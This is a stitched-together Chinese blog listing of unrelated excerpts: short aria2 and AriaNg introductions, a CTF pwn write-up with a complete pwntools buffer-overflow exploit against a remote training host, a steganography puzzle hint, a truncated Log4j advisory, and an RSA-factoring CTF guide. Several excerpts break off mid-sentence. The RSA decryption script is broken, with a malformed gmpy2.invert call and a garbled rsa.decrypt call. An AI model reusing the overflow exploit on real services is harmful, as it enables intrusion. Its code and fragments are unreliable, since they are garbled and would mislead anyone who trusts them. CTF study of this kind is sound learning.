介绍AriaNg 是一个 Web 前端，使aria2更易于使用。AriaNg 是用纯 html 和 javascript 编写的，因此它不需要任何编译器或运行时环境。您可以将 AriaNg 置于您的网络服务器并在浏览器中打开它。AriaNg 使用响应式布局，并支持任何桌面或移动设备。 项目地址：https://github.com/mayswind/AriaN

介绍Aria2是一款开源下载工具，可帮助简化不同设备和服务器之间的下载过程。它支持磁力链接、BT种子、http等类型的文件下载，与迅雷及QQ旋风相比，Aria2有着优秀的性能及较低的资源占用,架构本身非常轻巧，通常只需要4兆字节（HTTP下载）到9兆字节（用于BitTorrent交互）之间。最重要的

jarvisoj_level0 发现只开了NX 使用IDA反编译，发现有溢出点，也有后门函数 是个白给题， from pwn import * #p = process('./level0') p = remote ('node4.buuoj.cn',26348) binsh = 0x400596 payload = 'A'*0x88 + p64(binsh) p.sendline(payload) p.interactive()

拿到手是一个图片，使用binwalk或foremost可以得到一个压缩包 里面是一个打不开的图片， 使用windows的画图可以强行打开，发现文件高度有问题 使用二进制编辑器修改高度后，打开会发现一串字符 二进制查看图片的结束之后还有一段hint: 将其16进制转换为8进制后，再作为十六进制转换为ascii码

漏洞描述Apache Log4j 是 Apache 的一个开源项目，Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等，通过定义每一条日志信息的级别，能够更加细致地控制日志的生成过程。该日志框架被大量用于

已有公钥，解密文本

公钥与私钥的产生

##计算过程

目的是得到 N e p q 从而解密

使用openssl计算模数N和指数e

openssl rsa -pubin -text -modulus -in warmup -in <public key file>

使用yafu对N进行因数分解

关于yafu的安装使用，请看这篇帖子：http://blog.shenghuo2.top/index.php/archives/40/

或者使用在线网站查询结果 http://factordb.com/

得到p q

使用脚本解密

import gmpy2
import rsa

p =         
q =         
N =         
e =         
d = int(gmpy2.invert((e,p - 1) * (q - 1)))
privatekey = rsa.PrivateKey(N,e,d,p,q)
s = open("xxx.enc","rb")
print rsa.decrypt(s.read().privatekey).decode()